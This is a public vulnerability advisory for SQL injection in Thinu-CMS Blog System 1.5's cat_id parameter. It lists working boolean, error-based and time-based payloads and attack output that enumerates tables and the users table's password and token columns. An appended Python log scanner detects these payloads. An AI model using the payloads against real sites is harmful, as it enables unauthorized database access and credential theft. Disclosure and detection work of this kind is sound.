C r a C k E r

T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : https://www.codester.com/items/40401/
Vendor    : Thinu Tech
Software  : Thinu-CMS Blog System 1.5
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
═════════════

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09

    CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /category.php

http://website/category.php?cat_id=[SQLI]

GET parameter 'cat_id' is vulnerable to SQL Injection

---
Parameter: cat_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=3 AND 7897=7897

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat_id=3 OR (SELECT 8233 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(8233=8233,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat_id=3 AND (SELECT 1981 FROM (SELECT(SLEEP(5)))lKbu)
---

[+] Starting the Attack

fetching current database
current database: 'epiz_***50***_cms'

fetching tables

[10 tables]
+----------------+
| ad_providers   |
| advertisements |
| categories     |
| contacts       |
| navigation     |
| posts          |
| reports        |
| settings       |
| users          |
| users_online   |
+----------------+

fetching columns from Table 'users'

[16 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| about          | text         |
| cover_image    | text         |
| token          | text         |
| user_email     | varchar(255) |
| user_facebook  | text         |
| user_firstname | varchar(255) |
| user_id        | int(255)     |
| user_image     | text         |
| user_instagram | text         |
| user_job       | varchar(255) |
| user_lastname  | varchar(255) |
| user_password  | varchar(255) |
| user_role      | varchar(255) |
| user_twitter   | text         |
| user_website   | text         |
| username       | varchar(255) |
+----------------+--------------+

[-] Done
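
Detection example added here (not part of the original advisory and not the vendor's code): it scans web access logs for requests to /category.php whose cat_id is not a plain integer and labels them with the three technique classes reported above. It assumes cat_id is always a numeric identifier and that logs use the combined log format; the scan helper and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in combined log format (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /category.php?cat_id=3 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=2 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /category.php?cat_id=3%20AND%207897%3D7897 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:02 +0000] '
    '"GET /category.php?cat_id=3%20OR%20(SELECT%20COUNT(*)%20FROM%20INFORMATION_SCHEMA.PLUGINS'
    '%20GROUP%20BY%20FLOOR(RAND(0)*2)) HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:01:09 +0000] '
    '"GET /category.php?cat_id=3%20AND%20(SELECT%201981%20FROM%20(SELECT(SLEEP(5)))lKbu) HTTP/1.1" 200 5120',
    '203.0.113.44 - - [01/Jan/2024:10:02:00 +0000] "GET /category.php?cat_id=3%27 HTTP/1.1" 200 640',
]

# Request line inside the quoted field: method, target, protocol.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER = re.compile(r"[0-9]+")

# Hints for the technique classes named in the advisory, checked in order.
TECHNIQUES = [
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def scan(lines, path="/category.php", param="cat_id"):
    """Return (client_ip, label, decoded_value) for every non-integer value of param."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != path:
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared in clear text.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if INTEGER.fullmatch(value):
                continue  # expected shape of a category id
            label = next((name for name, rx in TECHNIQUES if rx.search(value)),
                         "non-numeric value")
            findings.append((line.split()[0], label, value))
    return findings

if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}  {label:<20}  {value}")
```

The integer check is the primary signal; the technique labels only help triage and should not be relied on as the sole filter.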